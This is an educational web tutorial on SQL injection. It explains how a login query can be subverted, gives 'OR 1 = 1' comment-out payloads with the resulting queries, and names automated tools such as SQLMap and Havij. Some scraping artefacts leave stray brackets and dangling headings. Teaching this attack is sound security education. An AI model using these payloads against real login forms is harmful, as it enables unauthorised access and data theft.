SQL Injection Tutorial: Learn with Example

This tutorial is 100% for Education Purpose only. Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking. Do not attempt to violate the law with anything contained here. If you planned to use the content for illegal purposes, then please leave this site immediately! We will not be responsible for any illegal actions.

SQL stands for Structured Query Language. It is used to retrieve and manipulate data in the database.

What is a SQL Injection?

SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true.

How does it work?

Let’s say we have this query:

SELECT * FROM users WHERE email = ‘[userinput]’ AND password = md5(‘1234’);

The above code can be exploited by commenting out the password part and appending a condition that will always be true. Let’s suppose an attacker provides the following input in the email address field.

xxx@xxx.xxx’ OR 1 = 1 LIMIT 1 — ‘ ]

So, it will produce a final query like this:

SELECT * FROM users WHERE email = ‘xxx@xxx.xxx’ OR 1 = 1 LIMIT 1 — ‘ ] AND password = md5(‘1234’);

Explanation:

• xxx@xxx.xxx ends with a single quote which completes the string quote
• OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to only one record.
• — ‘ AND … is a SQL comment that eliminates the password part.

Visit this link to have a simple web application that is vulnerable to SQL injection attacks for demonstration purposes only.

Login | Personal Contacts Manager

Source: https://www.guru99.com/images/EthicalHacking/Article_13_6.png

SELECT * FROM users WHERE email = ‘xxx@xxx.xxx’ AND password = md5(‘xxx’) OR 1 = 1 — ]’);

The process of how the query can produce a TRUE output as the result is shown in this picture below

Other SQL Injection attack types

SQL Injection can do more harm than just by passing the login algorithms. Some of the attacks include:

• Deleting data
• Updating data
• Inserting data
• Executing commands on the server that can download and install malicious programs such as Trojans
• Exporting valuable data such as credit card details, email, and passwords to the attacker’s remote server
• Getting user login details etc

Automation Tools for SQL Injection

In the above example, we used manual attack techniques based on our vast knowledge of SQL. There are automated tools that can help you perform the attacks more efficiently and within the shortest possible time. These tools include:

• SQLSmack — http://www.securiteam.com/tools/5GP081P75C.html
• SQLPing 2 — http://www.sqlsecurity.com/downloads/sqlping2.zip?attredirects=0&d=1
• SQLMap — http://sqlmap.org/

Use Havij for SQL Injection

Summary

• SQL Injection is an attack-type that exploits bad SQL statements
• SQL injection can be used to bypass login algorithms, retrieve, insert, and update and delete data.
• SQL injection tools include SQLMap, SQLPing, and SQLSmack, etc.
• A good security policy when writing SQL statements can help reduce SQL injection attacks.

Resources:

SQL Injection Tutorial: Learn with Example